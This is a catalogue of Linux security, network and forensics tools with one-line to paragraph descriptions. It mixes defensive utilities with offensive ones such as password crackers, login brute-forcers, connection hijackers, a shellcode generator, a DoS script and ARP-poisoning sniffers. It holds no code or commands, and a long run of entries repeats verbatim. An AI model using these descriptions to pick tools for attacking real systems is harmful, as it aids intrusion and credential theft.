memfetch – dumps the memory of a program without disrupting its operation, either immediately or on the nearest fault condition (such as SIGSEGV). It can be used to examine suspicious or misbehaving processes on your system, verify that processes are what they claim to be, and examine faulty applications using your favorite data viewer so that you are not tied to the inferior data inspection capabilities in your debugger.
mtr – mtr combines the functionality of the ‘traceroute’ and ‘ping’ programs in a single network diagnostic tool.
nasm – Netwide Assembler. NASM will currently output flat-form binary files, a.out, COFF and ELF Unix object files, and Microsoft 16-bit DOS and Win32 object files.
nast – Can sniff in normal mode or in promiscuos mode the packets on a network interface and log it. It dumps the headers of packets and the payload in ascii or ascii-hex format. You can apply a filter. The sniffed data can be saved in a separated file.
nbtscan – NBTscan is a program for scanning IP networks for NetBIOS name information. It sends NetBIOS status query to each address in supplied range and lists received information in human readable form. For each responded host it lists IP address, NetBIOS computer name, logged-in user name and MAC address (such as Ethernet).
nemesis – The Nemesis Project is designed to be a commandline-based, portable human IP stack for UNIX/Linux. The suite is broken down by protocol, and should allow for useful scripting of injected packet streams from simple shell scripts.
nessus – Nessus is a free, up-to-date, and full featured remote security scanner for Linux, BSD, Solaris and some other systems. It is multithreaded, plugin-based, has a nice GTK interface, and currently performs over 330 remote security checks. It has powerful reporting capabilities (HTML, LaTeX, ASCII text) and not only points out problems, but suggests a solution for each of them.
netcat – NetCat by Hobbit. Great all around TCP/IP utility loaded with features. Highly recommended.
netsed – Netsed v0.01b brings sed functionality to the network layer, allowing you to change the contents of packets traveling through your network on the fly and in a completely transparent manner. It features basic expressions and dynamic filtering, and cooperates with ipfwadm/ipchains transparent proxy rules to pick specific packets.
ngrep – an awesomly powerful network too which strives to provide most of GNU grep’s common features, applying them to the network layer.
nikto – web server scanner which supports SSL. Nikto checks for (and if possible attempts to exploit) remote web server vulnerabilities and misconfigurations. It also looks for outdated software and modules, warns of any version specific problems, supports scans through proxies (with authentication), host Basic authentication and more. Data is kept in CSV format databases for easy maintenance, and supports the ability to automatically update local databases with current versions on the Nikto web site.
Nmap – The best and most well-known network scanner there is. port scanning, OS detection, service detection, rpc service detection
nstreams – a program that analyzes the networks streams occuring on a network and prints them in a human readable form.
ntop – a tool that shows the network usage, similar to what the popular Unix command top does. ntop can be used in both interactive or web mode. In the first case, ntop displays the network status on the user’s terminal whereas in web mode a web browser (e.g. netscape) can attach to ntop (that acts as a web server) and get a dump of the network status. In the latter case, ntop can be seen as a simple RMON-like agent with an embedded web interface.
numby – scans for relay vulnerable http-proxies
obiwan – brute force authentication attack against Webserver with authentication requests – and in fact to break in insecure accounts.
objobf – objobf is an obfuscater for x86/Linux ELF relocatable object files (.o files) that can produce fancy graphs to visualize function structures.
ol2mbox – This project provides libraries and applications for the conversion of Outlook and Outlook Express data files to Linux MBOX format. The flagship of this project is LibPST which converts Outlook files.
onesixtyone – efficient SNMP scanner which utilizes a sweep technique to achieve good performance. It finds SNMP devices on your network and brute-forces the community strings using a dictionary. It is possible to scan a class B network (65536 ip addresses) in under 13 seconds with a high degree of accuracy.
openssl – OpenSSL is a robust, fully featured Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols with full-strength cryptography world-wide.
p0f – performs passive OS detection by watching SYN packets with tcpdump. Additionally, it is able to determine distance to remote host, and can be used to determine the structure of a foreign or local network. When running on the gateway of a network it is able to gather huge amounts of data and provide useful statistics. On a user-end computer it could be used to track which operating systems are making each connection. p0f supports full tcpdump-style filtering expressions, and has an easily modified fingerprinting database.
packit – Packit offers the ability to monitor, manipulate and inject IPv4 (and soon IPv6) traffic (TCP/UDP/ICMP) on and into your network. This can be valuable in testing firewalls, intrusion detection systems and in general TCP/IP auditing. At the comment Packit can be run using one of two modes. packet capture, and IPv4 packet injection.
paketto – implements many of the techniques described in recent TCP/IP Black Ops talks. Scanrand implements extremely fast and efficient port, host, and network trace scanning which uses cryptographic signatures. Minewt implements technique known as MAC Address Translation which allows several backend hosts to share the same IP address. Linkcat (lc) does at Layer 2 (Ethernet) what Netcat does for Layer 4-7(TCP/UDP). Phentropy plots large amounts of arbitrary data onto a three dimensional volumetric matrix allowing you to see the Strange Attractors which can be used to predict future values from an otherwise random system. Paratrace traces the path between a client and a server like traceroute but at Layer 4. It attaches to an existing, firewall-approved TCP flow, analyzing the resultant ICMP Time Exceeded replies.
partimage – utility to save partitions (ext2/3fs, reiserfs, fat16, fat32, hpfs, ntfs) into an image file. Only used blocks of the partition are saved, and the image can be
compressed in gzip or bzip2 format.
photorec – a little tool to recover pictures from digital camera memory.
pnscan – Pnscan is a multi threaded port scanner that can scan a large network very quickly. If does not have all the features that nmap have but is much faster.
pptpd – PoPToP Point to Point Tunneling Server. This implements a Virtual Private Networking Server (VPN) that is compatible with Microsoft VPN clients. It allows windows users to connect to an internal firewalled network using their dialup.
pwl9x – The Windows 9x Password List reader is a UNIX program that will allow you to see the passwords contained in your Windows PWL database. You can check the security of these files and try to recover the main password using brute force methods.
rarpd – Reverse Address Resolution Protocol Daemon. rarpd listens on the ethernet for broadcast packets asking for reverse address resolution. These packets are sent by hosts at boot time to find out their IP address
recover – Undelete files on ext2 partitions
redir – a port redirector, used to forward incoming connections to somewhere else. by far the cleanest piece of code here, because someone else liked it enough to fix it.
revinetd – GNU implementation of the TCP gender changer. It operates in two modes, listen-listen and connect-connect. It can be used to forward traffic through firewalls where outbound rule sets are more liberal than inbound rules.
samba-tng – fork of Samba. It was derived from the same code but is being developed independently.
sara – Security Auditor’s Research Assistant (SARA) is a security analysis tool based on the SATAN model. It is updated frequently to address the latest threats. Checks for common old holes, backdoors, trust relationships, default cgi, common logins.
scanssh – scans a list of addresses and networks for running SSH servers and their version numbers. scanssh supports random selection of IP addresses from large network ranges and is useful for gathering statistics on the deployment of SSH servers in a company or the Internet as whole.
scli – a collection of SNMP command line management tools
screamingcobra – an application for remote vulnerability discovery in ANY UNKNOWN web applications such as CGIs and PHP pages. Simply put, it attempts to find vulnerabilities in all web applications on a host without knowing anything about the applications. Modern CGI scanners scan a host for CGIs with known vulnerabilities. ScreamingCobra is able to ‘find’ the actual vulnerabilities in ANY CGI, whether it has been discovered before or not.
secpanel – A graphical user interface for SSH and SCP
secure_delete – Secure Deletion Utilities
sendip – a commandline tool to send arbitrary IP packets. It has a large number of command line options to specify the content of every header of a TCP, UDP, ICMP, or raw IP packet. It also allows any data to be added to the packet. Checksums can be calculated automatically, but if you wish to send out wrong checksums, that is supported too.
sharefuzz – shared library which automatically detects environment variable overflows in Unix systems. This tool can be used to ensure all necessary patches have been applied, or as a reverse engineering tool.
shiva – tool to encrypt ELF executables under Linux. Shiva can be used to wrap an executable in such a way that though it continues to run as it did before it is very difficult to debug or reverse engineer. Shiva can be used to password protect critical programs, including setuid programs, or simply to obfuscate sensitive data stored within programs.
sing – A fully programmable ping replacement
sleuthkit – collection of open source file system forensics tools that allow one to view allocated and deleted data from NTFS, FAT, FFS, and EXT2FS images. The Autopsy Forensic Browser provides a graphical interface to The Sleuth Kit
slogdump – extracts syslog packets from tcpdump ethernet savefiles
smb-nat – This tool can perform various security checks on remote servers running NetBIOS file sharing services. It is capable of enumerating shares and make break-in attempts using a (user-provided) list of users and passwords.
snapscreenshot – takes a screenshot from a single Linux virtual console (tty) or from a group of ttys.
socat – establishes two bidirectional byte streams and transfers data between them. Data channels may be files, pipes, devices (terminal or modem, etc.), or sockets (Unix, IPv4, IPv6, raw, UDP, TCP, SSL). It provides forking, logging, and tracing, different modes for interprocess communication, and many more options.
spike – Spikeman’s DoS Attack Tool – Revision 5.2. 33 denial of service attacks at once, launched from a 61k shell script! Changes: Never Die Menu Added, new attacks
spikeproxy – functions as an HTTP and HTTPS proxy, and allows the web developer or web application auditor low level access to the entire web application interface, while also providing a bevy of automated tools and techniques for discovering common problems.
splint – tool for statically checking C programs for security vulnerabilities and coding mistakes. With minimal effort, Splint can be used as a better lint. If additional effort is invested adding annotations to programs, Splint can perform stronger checking than can be done by any standard lint.
ssh – Secure rlogin/rsh/rcp replacement
ssldump – SSLv3/TLS network protocol analyzer. It identifies TCP connections on the chosen network interface and attempts to interpret them as SSLv3/TLS traffic. When it identifies SSLv3/TLS traffic, it decodes the records and displays them in a textual form to stdout. If provided with the appropriate keying material, it will also decrypt the connections and display the application data traffic.
strace – a system call trace, a debugging tool which prints out a trace of all the system calls made by another process/program. The program to be traced need not be recompiled for this, so you can use it on binaries for which you don’t have source. System calls and signals are events that happen at the user/kernel interface. A close examination of this boundary is very useful for bug isolation, sanity checking and attempting to capture race and buffer overflow conditions.
stunnel – designed to work as SSL encryption wrapper between remote client and local (inetd-startable) or remote server. The concept is that having non-SSL aware daemons running on your system you can easily setup to communicate with clients over secure SSL channels. stunnel can be used to add SSL functionality to commonly used inetd daemons like POP-2, POP-3 and IMAP servers as well as standalone daemons like NNTP, SMTP and HTTP without changes to the source code.
sudo – a program that provides limited superuser privileges, does not properly handle improper file access attempts, revealing information about file existence.
tcpdump – allows you to dump the traffic on a network. It can be used to print out the headers of packets on a network interface that matches a given expression. You can use this tool to track down network problems, to detect “ping attacks” or to monitor the network activities. Changes: -X option added, telnet command sequence decoder, many bug fixes, SMB printing, NFS parsing, AFS3 packet parsing, etc
tcpflow – a program that captures data transmitted as part of TCP connections (flows), and stores the data in a way that is convenient for protocol analysis or debugging. tcpflow understands TCP sequence numbers and will correctly reconstruct data streams regardless of retransmissions or out-of-order delivery. Each stream is stored in a separate file for later analysis.
tcprelay – aimed at testing the performance of a NIDS by replaying real background network traffic in which to hide attacks. Tcpreplay allows you to control the speed at which the traffic is replayed, and can replay arbitrary tcpdump traces. Unlike programmatically-generated artificial traffic which doesn’t exercise the application/protocol inspection that a NIDS performs, and doesn’t reproduce the real-world anomalies that appear on production networks (asymmetric routes, traffic bursts/lulls, fragmentation, retransmissions, etc.), tcpreplay allows for exact replication of real traffic seen on real networks.
tcpslice – tool for extracting portions of packet trace files generated using tcpdump’s -w flag.
tcptrace – analyzer for tcpdump logfiles.
tct – collection of tools which are geared towards gathering and analyzing forensic data UNIX system after a break-in. TCT features the grave-robber tool which captures information, the ils and mactime tools that display access patterns of files dead or alive, the unrm and lazarus tools that recover deleted files, and the keyfind tool that recovers cryptographic keys from a running process or from files.
tethereal – Network traffic analyzer (console)
thcrut – local network discovery tool developed to brute force its way into wvlan access points. It offers arp-request on ip-ranges and identifies the vendor of the NIC, spoofed DHCP, BOOTP and RARP requests, icmp-address mask request and router discovery techniques. This tool should be ‘your first knife’ on a foreign network.
transproxy – The program is used in conjunction with the Linux Transparent Proxy networking feature, and ipfwadm, to transparently proxy HTTP and other requests.
tsocks – tsocks provides transparent network access through a SOCKS version 4 or 5 proxy (usually on a firewall). tsocks intercepts the calls applications make to establish TCP connections and transparently proxies them as necessary. This allows existing applications to use SOCKS without recompilation or modification.
valgrind – A memory debugger for x86-linux
vmap – utility for fingerprinting services by checking features and replies of bogus commands being fed to the daemon. Currently supports FTP, SMTP, POP3, IMAP, and HTTP.
walker – Compuserve 3.0 Password Decrypter. It decrypts Compuserve 3.0 ini files (cis.ini) that stores account passwords
wipe – Recovery of supposedly erased data from magnetic media is easier than what many people would like to believe. A technique called Magnetic Force Microscopy (MFM) allows any moderately funded opponent recover the last two or three layers of data written to disk. Wipe repeadetly overwrites special patterns to the files to be destroyed, using the fsync() call and/or the O_SYNC bit to force disk access. Changes: Use of /dev/urandom to seed libc’s random() additive feedback pseudo-random generator; a new 32-bit seed is fetched for every 1024 bytes.
aide – AIDE (Advanced Intrusion Detection Environment) is a free replacement for Tripwire(tm). It generates a database that can be used to check the integrity of files on server. It uses regular expressions for determening which files get added to the database. You can use several message digest algorithms to ensure that the files have not been tampered with.
aisnort – Airsnort is a tool for wireless lans which recovers encryption keys by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. Works on both 40 and 128 bit encryption. Many weaknesses in the WEP 802.11 protocol are discussed here. AirSnort is the first publicly available implementation of this attack. Once enough packets have been gathered, AirSnort can guess the encryption password in under a second.
amap – Amap is a scanning tool that allows you to identify the applications that are running on (a) specific port(s). It does this by connecting to the port(s) and sending trigger packets. These trigger packets will typically be an application protocol handshake (i.e. SSL). Amap then looks up the response in a list and prints out any match it finds. Adding new response identifications can be done just by adding them to an easy-to-read text file. With amap, you will be able to identify that SSL server running on port 3445 and some oracle listener on port 233!
argus-client & argus server – Argus is a generic IP network transaction auditing tool; it enables a site to generate comprehensive network transaction audit logs, allowing user to perform extensive analysis of network traffic.
arpd – rarpd v1.0 is a Reverse Address Resolution Protocol Daemon. rarpd listens on the ethernet for broadcast packets asking for reverse address resolution. These packets are sent by hosts at boot time to find out their IP address.
arping – Arping is an arp level ping utility which broadcasts a who-has ARP packet on the network and prints answers. Very useful when you are trying to pick an unused IP for a net that you don’t yet have routing to.
arpwatch – Arpwatch is a tool that monitors ethernet activity and keeps a database of ethernet/ip address pairings. It also reports certain changes via email. Arpwatch requires tcpdump and libpcap. Includes FDDI support, updated ethercodes, uses autoconf.
autopsy – The Autopsy Forensic Browser is an HTML-based graphical interface to The [at]stake Sleuth Kit (TASK). Together, TASK and Autopsy Forensic Browser are an open source alternative to the common Windows-based digital forensic tools. Autopsy provides an investigator with an HTML-based graphical interface that allows one to browse images from compromised systems in a “File Manager”-like interface. Windows and UNIX file systems can be analyzed to view deleted files, create time lines of file activity, and perform key word searches.
babelweb – Babelweb is a program which allows to automate tests on a HTTP server. It is able to follow the links and the HTTP redirect but it is programmed to remain on the original server.
bfbtester – BFBTester is a utility for doing quick, proactive security checks of binary programs by performing checks of single and multiple argument command line overflows and environment variable overflows. It will also watch for tempfile creation activity to alert the user of any programs using unsafe tempfile names. While BFBTester can not test all overflows in software, it is useful for detecting initial mistakes that can red flag dangerous software.
biew – Biew is Binary vIEWer with built-in editor for binary, hexadecimal and disassembler modes. It contains a PentiumIII/K7Athlon/Cyrix-M2 disassembler, full preview of MZ, NE, PE, LE, LX, DOS.SYS, NLM, arch, ELF, a.out, coff32, PharLap, and rdoff executable formats, a code guider, a text viewer with russian codepages support, and many other features.
bing – Bandwidth
Ping. Estimates bandwidths between network hosts and routers.
cabextract – a program to extract Microsoft cabinet (.CAB) files.
cflow – Reads and analyzes flow files
cheops – Cheops is a network “swiss army knife”. It’s a combination of a variety of network tools to provide system adminstrators and users with a simple interface to managing and accessing their networks. Cheops aims to do for the network what the file manager did for the filesystem. Features include: Network mapping via UDP and/or ICMP packets, port detection using half-open tcp connections (ala halfscan), OS detection using invalid flags on TCP packets (ala queso), Domain scans, ICMP pings, much more.
chkrootkit – checks for signs of a rootkit. Includes ifpromisc.c to check and see if the interface is in promisc mode, chklastlog.c to check lastlog for deletions, and chkwtmp.c to check wtmp for deletions. Tested on Linux 2.0.x, 2.2.x and FreeBSD 2.2.x, 3.x and 4.0. Changes: lrk5 detection, Sun/Solaris support, and Red Hat fixes.
chntpw – NT SAM password recovery utility
cmospwd – CmosPwd decrypts password stored in cmos used to access BIOS SETUP
cracklib2 – A pro-active password checker library
cryptcat – Cryptcat is an encrypted version of netcat. It uses AES encryption and a static key to encrypt all transactions. Previous versions had a flaw in which not all network traffic was encrypted so this is the patched version.
darkstat – Darkstat is an ntop-workalike network statistics gatherer. Built to be faster and smaller than ntop, it uses libpcap to capture network traffic and serves up Web page reports of statistics such as data transferred by host, port, and protocol. It also has a neat bandwidth usage graph.
dcetest – tool which probes a windows machine over TCP port 135, MSRPC endpoint information. It can be though of as the equivalent of rpcinfo -p against a Windows box. Dcetest can also be very useful once inside a DMZ to fingerprint Windows machines on the network.
dcfldd – Enhanced DD imager with built in hashing. Works like dd from command line.
dd_rescue – Like dd, dd_rescue does copy data from one file or block device to another. You can specify file positions (called seek and Skip in dd).
dlint – Dlint analyzes any DNS zone you specify and reports any problems it finds by displaying errors and warnings. Then it descends recursively to examine all zones below the given one (this can be disabled with a command-line option).
dnswalk – dnswalk is a DNS database debugger. It works by initiating a zone transfer of a current zone, inspecting individual records for inconsistencies with other data, and generating warnings and errors. It is not a parser of DNS datafiles, it works strictly via existing DNS query methods on a “live” system (however dnswalk can be run on a separate nameserver which has data ready to move into production).
driftnet – Driftnet is a program which sniffs network traffic and picks out images from TCP streams it observes. It is interesting to run it on a host which sees a lot of web traffic. Changes: This release fixes problems with building in adjunct-only mode. There are performance enhancements.
dsniff – dsniff is a suite of utilities that are useful for penetration testing. It consists of the following programs: arpredirect intercepts packets from a target host on the LAN intended for another host on the LAN by forging ARP replies. findgw determines the local gateway of an unknown network via passive sniffing. macof floods the local network with random MAC addresses. tcpkill kills specified in-progress TCP connections. dsniff is a simple password sniffer which handles many protocols. mailsnarf outputs all messages sniffed from SMTP traffic in Berkeley mbox format. webspy sends URLs sniffed from a client to your local Netscape browser for display, updated in real-time. Changes: Added parsing for Napster, AIM, ICQ (v2, v5), and CVS pserver. Now supports more non-glibc Linux systems missing ether_ntoa(). Unique HTTP authentication information by directory is now supported. dsniff now skips IMAP command tag, and doesn’t rely on /etc/services.
echoping – echoping is a small program to approximatively test the performance of a remote host by sending it TCP “echo” packets. It is able to use the following protocols: echo, discard, chargen, HTTP (with SSL if you wish), ICP, and SMTP. It uses UDP instead of TCP for the protocols which accept it (like echo), it can repeat the test and display various statistics, and it can use T/TCP on systems which support it. Changes: SSL (Secure Sockets Layer) support, and a new ability to read many bytes at a time for a big performance improvement.
etherape – Etherape is an etherman clone which displays network activity graphically. Active hosts are shown as circles of varying size, and traffic among them is shown as lines of varying width. It is GNOME and pcap based. Changes: Much better now.
ethereal – Ethereal is a GTK+-based network protocol sniffer / analyzer
ettercap – Ettercap is a network sniffer/interceptor/logger for switched LANs. It uses ARP poisoning and the man-in-the-middle technique to sniff all the connections between two hosts. Features character injection in an established connection – you can inject characters to server (emulating commands) or to client (emulating replies) while maintaining the connection alive! Integrated into a easy-to-use and powerful ncurses interface.
farpd – Fake ARP user space daemon. This ARP daemon replies to any ARP request for a set of IP addresses with the hardware MAC address of one of the interfaces of the server after determining that no other host in the network is claiming that IP.
fatback – Analyze and recover deleted FAT files from Linux
fenris – Fenris is a multipurpose tracer, stateful analyzer and partial decompiler intended to simplify bug tracking, security audits, code, algorithm, protocol analysis and computer forensics by providing a structural program trace, general information about internal constructions, execution path, memory operations, I/O, conditional expression info, and much more.
flawfinder – Flawfinder searches through source code for potential security flaws, listing potential security flaws sorted by risk, with the most potentially dangerous flaws shown first. This risk level depends not only on the function, but on the values of the parameters of the function.
fping – Fping is a ping(1) like program which uses the Internet Control Message Protocol (ICMP) echo request to determine if a host is up. fping is different from ping in that you can specify any number of hosts on the command line, or specify a file containing the lists of hosts to ping. Instead of trying one host until it timeouts or replies, fping will send out a ping packet and move on to the next host in a round-robin fashion. If a host replies, it is noted and removed from the list of hosts to check. If a host does not respond within a certain time limit and/or retry limit it will be considered unreachable. Unlike ping, fping is meant to be used in scripts and its output is easy to parse.
fragroute – Fragroute intercepts, modifies, and rewrites egress traffic destined for a specified host, implementing most of the attacks described in the Secure Networks “Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection” paper of January 1998. It features a simple ruleset language to delay, duplicate, drop, fragment, overlap, print, reorder, segment, source-route, or otherwise monkey with all outbound packets destined for a target host, with minimal support for randomized or probabilistic behavior. Includes scripts to defeat even the current CVS snort IDS.
freeswan – Linux FreeS/WAN provides IPSEC (IP Security, which is both encryption and authentication) kernel extensions and an IKE (Internet Key Exchange, keying and encrypted routing daemon) as well as various rc scripts and documentation. This lets a bright Linux sysadmin build VPN’s gateways out of even old 584 and 486 PC Clone boxes. The 1.00 version is known to inter-operate with other IPSEC and IKE system already deployed by other vendors such as OpenBSD.
gdb – the GNU Project debugger, allows you to see what is going on `inside’ another program while it executes — or what another program was doing at the moment it crashed.
gnupg – GnuPG is a complete and free replacement for PGP. Because it does not use IDEA or RSA it can be used without any restrictions. GnuPG is a RFC2440 (OpenPGP) compliant application.
grenzgaenger – SOCKS-like hacker tool for tunneling nmap, netcat and exploits transparently through systems into protected networks
gtkrecover – gtkrecover is a GUI for recover, a program that undeletes files on ext2 partitions. You can search for a deleted files.
hackbot – host exploration tool and banner grabber. It scans hosts for FTP banners, SSH banners, Open Relays, EXPN and VRFY options, more than 200 common CGI vulnerabilities and common indexable directories, NT unicode vulnerabilities and NT nimda infections.
hammerhead – A stress testing tool designed to test out your web server and web site. It can initiate multiple connections from IP aliases and simulated numerous (256+) users at any given time. The rate at which Hammerhead attempts to pound your site is fully configurable, there are numerous other options for trying to create problems with a web site (so you can fix them).
hellkit – Hellkit is a shellcode generator. You write the your shellcode in C, and it gets converted to ASM for use with both heap and stack based overflows. Many examples included. Changes: Added generic shellcode decoder which can handle shellcode up to 64kb in length containing any bytes, added encoder for this type of decoder, and fixed some signedness issues in array accessment.
hjksuite – collection of programs for hijacking. First of all it contains hjklib, a library for hijacking. It contains also some programs like hjkbnc which allows irc hijackinig directly with your client, hjkhttpd for hijacking HTTP sessions, and hjknetcat, for hijacking text connections.
hping2 – Hping is a software to do TCP/IP stack auditing, to uncover firewall policy, to scan TCP port in a lot of different modes, to transfer files accross a firewall, test network performance, test of TOS is handled, etc.
httptunnel – httptunnel creates a bidirectional data channel through an HTTP proxy, from your isolated computer behind a restrictive firewall, to a system on the Internet you have access to.
httpush – HTTPush aims at providing an easy way to audit HTTP and HTTPS application/server security. It supports on-the-fly request modification, automated decission making and vulnerability detection through the use of plugins and full reporting capabilities.
hunt – Hunt is a tool for exploiting well known weaknesses in TCP/IP protocol. Use primarily to hijack connections, but has many other features.
hydra – the world’s first parallel login hacker. With this tool you are able to attack several services at once.
icmpinfo – Tracks ICMP packets, allowing you to proactively watch for suspicious behaviour, mainly ICMP unreachables.
icmpush – program that sends icmp error packets and obtains remote info throught icmp packets. Supports spoof and broadcasting. This new release supports the following ICMP error types: Unreach, Parameter Problem, Redirect and Source Quench; ICMP information types: Timestamp, Address Mask Request, Information Request, Router Solicitation (Router Discovery), Router Advertisement (Router Discovery) and Echo Request. This program features an excellent interface with a wide number of options (flags) and values. As an added bonus, Slayer has included a mini-script called try_reset that tries to reset existing telnet or rlogin connections. Your security auditing toolkit is not complete without this program! One of the few 5-star programs.
idswakeup – idswakeup is a Bourne shell script invoking hping2 (required) and iwu (part of this package) to generate false alarms in order to check if a network intrusion detection system works all right.
ipchains – ipchains-firewall is an easily-configurable shell script to establish masquerading and firewalling rules using ipchains.
iproute – professional set of tools to control the networking behavior in kernels 2.2.x and later.
ipsorc – TCPIP packet generator which allows you to send TCP, UDP, and ICMP packets with a GTK+ interface.
iptraf – ncurses-based IP LAN monitor that generates various network statistics including TCP info, UDP counts, ICMP and OSPF information, Ethernet load info, node stats, IP checksum errors, and others.
iputils-ping – Tools to test the reachability of network hosts
irpas – Internetwork Routing Protocol Attack Suite, a collection of programs used for advanced network operations, testing, and debugging.
isic – Crafts random packets and launches them. Can fix or randomize source/dest IP’s and Ports. You can specify the percentage of packets to fragment, to have IP options, to have bad IP versions…. Just about every field can be automagically twiddled. It contains distinct programs for TCP, UDP, ICMP, IP with a randomized protocol field and a program for randomized raw ethernet frames.
isnprober – tool that samples TCP Initial Sequence Numbers and can use that information to determine if a set of IP addresses belong to the same TCP/IP stack (machine) or not.
itunnel – ICMP tunneling tool
john – John the Ripper v1.6 (UNIX — source distribution) – High quality UNIX password cracker, probably the fastest available. New Features: Batch mode, Kerberos AFS passwords support, WinNT passwords support, Idle priority support on Linux, Rule reject flags: can reject entire rules on condition, New utility: ‘unique’ (removes duplicated lines without re-ordering), New options: ‘-stdout’, ‘-status’.
kismet – 802.11b wireless network sniffer. It is capable of sniffing using almost any wireless card supported in Linux, which currently divide into cards handled by libpcap and the Linux-Wireless extensions (such as Cisco Aironet), and cards supported by the Wlan-NG project which use the Prism/2 chipset (such as Linksys, Dlink, and Zoom). Features Multiple packet capture sources, Runtime network sorting by AP MAC address (bssid), IP block detection via ARP and DHCP packet dissection, Cisco product detection via CDP, Ethereal and tcpdump compatible file logging, Airsnort-compatible “interesting” (cryptographically weak) logging, and Secure SUID behavior.
l2tpd – the Layer 2 Tunnelling Protocol Daemon
lcrzoex – toolbox for network administrators and network hackers. Lcrzoex contains over 200 functionalities using network library lcrzo. For example, one can use it to sniff, spoof, create clients/servers, create decode and display packets, etc. The Ethernet, IP, UDP, TCP, ICMP, ARP and RARP protocols are supported.
lde – disk editor for linux, originally written to help recover deleted files.
login_hacker – THC Modem Login Hacker – A tool that will attempt to break into modem dialups using scripts written for minicom. Extremely configurable and a must have for any penetration test.
lsof – Lsof is a Unix-specific diagnostic tool. Its name stands for LiSt Open Files, and it does just that. It lists information about any files that are open by processes currently running on the system.
ltrace – debugging program which runs a specified command until it exits. While the command is executing, ltrace intercepts and records the dynamic library calls which are called by the executed process and the signals received by that process. It can also intercept and print the system calls executed by the program.
mac-robber – a forensics and incident response program that collects Modified, Access, and Change (MAC) times from files. Its output can be used as input to the ‘mactime’ tool in The [at]stake Sleuth Kit (TASK) to make a time line of file activity. mac-robber is similar to running the ‘grave-robber’ tool from The Coroner’s Toolkit with the ‘-m’ flag, except this is written in C and not Perl.
macchanger – MAC Changer is a utility for viewing/manipulating the MAC addresses of network interfaces which can set specific, random, vendor-based (with a 6000+ vendor list) and device-type-based MACs.
manipulate_data – Search data on a harddisk/partition/file, extract the part you are interested in, and write it back after you (maybe) modified it.
md5deep – cross-platform program to compute MD5 message digests on an arbitrary number of files.
memfetch – dumps the memory of a program without disrupting its operation, either immediately or on the nearest fault condition (such as SIGSEGV). It can be used to examine suspicious or misbehaving processes on your system, verify that processes are what they claim to be, and examine faulty applications using your favorite data viewer so that you are not tied to the inferior data inspection capabilities in your debugger.
mtr – mtr combines the functionality of the ‘traceroute’ and ‘ping’ programs in a single network diagnostic tool.
nasm – Netwide Assembler. NASM will currently output flat-form binary files, a.out, COFF and ELF Unix object files, and Microsoft 16-bit DOS and Win32 object files.
nast – Can sniff in normal mode or in promiscuos mode the packets on a network interface and log it. It dumps the headers of packets and the payload in ascii or ascii-hex format. You can apply a filter. The sniffed data can be saved in a separated file.
nbtscan – NBTscan is a program for scanning IP networks for NetBIOS name information. It sends NetBIOS status query to each address in supplied range and lists received information in human readable form. For each responded host it lists IP address, NetBIOS computer name, logged-in user name and MAC address (such as Ethernet).
nemesis – The Nemesis Project is designed to be a commandline-based, portable human IP stack for UNIX/Linux. The suite is broken down by protocol, and should allow for useful scripting of injected packet streams from simple shell scripts.
nessus – Nessus is a free, up-to-date, and full featured remote security scanner for Linux, BSD, Solaris and some other systems. It is multithreaded, plugin-based, has a nice GTK interface, and currently performs over 330 remote security checks. It has powerful reporting capabilities (HTML, LaTeX, ASCII text) and not only points out problems, but suggests a solution for each of them.
netcat – NetCat by Hobbit. Great all around TCP/IP utility loaded with features. Highly recommended.
netsed – Netsed v0.01b brings sed functionality to the network layer, allowing you to change the contents of packets traveling through your network on the fly and in a completely transparent manner. It features basic expressions and dynamic filtering, and cooperates with ipfwadm/ipchains transparent proxy rules to pick specific packets.
ngrep – an awesomly powerful network too which strives to provide most of GNU grep’s common features, applying them to the network layer.
nikto – web server scanner which supports SSL. Nikto checks for (and if possible attempts to exploit) remote web server vulnerabilities and misconfigurations. It also looks for outdated software and modules, warns of any version specific problems, supports scans through proxies (with authentication), host Basic authentication and more. Data is kept in CSV format databases for easy maintenance, and supports the ability to automatically update local databases with current versions on the Nikto web site.
Nmap – The best and most well-known network scanner there is. port scanning, OS detection, service detection, rpc service detection
nstreams – a program that analyzes the networks streams occuring on a network and prints them in a human readable form.
ntop – a tool that shows the network usage, similar to what the popular Unix command top does. ntop can be used in both interactive or web mode. In the first case, ntop displays the network status on the user’s terminal whereas in web mode a web browser (e.g. netscape) can attach to ntop (that acts as a web server) and get a dump of the network status. In the latter case, ntop can be seen as a simple RMON-like agent with an embedded web interface.
numby – scans for relay vulnerable http-proxies
obiwan – brute force authentication attack against Webserver with authentication requests – and in fact to break in insecure accounts.
objobf – objobf is an obfuscater for x86/Linux ELF relocatable object files (.o files) that can produce fancy graphs to visualize function structures.
ol2mbox – This project provides libraries and applications for the conversion of Outlook and Outlook Express data files to Linux MBOX format. The flagship of this project is LibPST which converts Outlook files.
onesixtyone – efficient SNMP scanner which utilizes a sweep technique to achieve good performance. It finds SNMP devices on your network and brute-forces the community strings using a dictionary. It is possible to scan a class B network (65536 ip addresses) in under 13 seconds with a high degree of accuracy.
openssl – OpenSSL is a robust, fully featured Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols with full-strength cryptography world-wide.
p0f – performs passive OS detection by watching SYN packets with tcpdump. Additionally, it is able to determine distance to remote host, and can be used to determine the structure of a foreign or local network. When running on the gateway of a network it is able to gather huge amounts of data and provide useful statistics. On a user-end computer it could be used to track which operating systems are making each connection. p0f supports full tcpdump-style filtering expressions, and has an easily modified fingerprinting database.
packit – Packit offers the ability to monitor, manipulate and inject IPv4 (and soon IPv6) traffic (TCP/UDP/ICMP) on and into your network. This can be valuable in testing firewalls, intrusion detection systems and in general TCP/IP auditing. At the comment Packit can be run using one of two modes. packet capture, and IPv4 packet injection.
paketto – implements many of the techniques described in recent TCP/IP Black Ops talks. Scanrand implements extremely fast and efficient port, host, and network trace scanning which uses cryptographic signatures. Minewt implements technique known as MAC Address Translation which allows several backend hosts to share the same IP address. Linkcat (lc) does at Layer 2 (Ethernet) what Netcat does for Layer 4-7(TCP/UDP). Phentropy plots large amounts of arbitrary data onto a three dimensional volumetric matrix allowing you to see the Strange Attractors which can be used to predict future values from an otherwise random system. Paratrace traces the path between a client and a server like traceroute but at Layer 4. It attaches to an existing, firewall-approved TCP flow, analyzing the resultant ICMP Time Exceeded replies.
partimage – utility to save partitions (ext2/3fs, reiserfs, fat16, fat32, hpfs, ntfs) into an image file. Only used blocks of the partition are saved, and the image can be
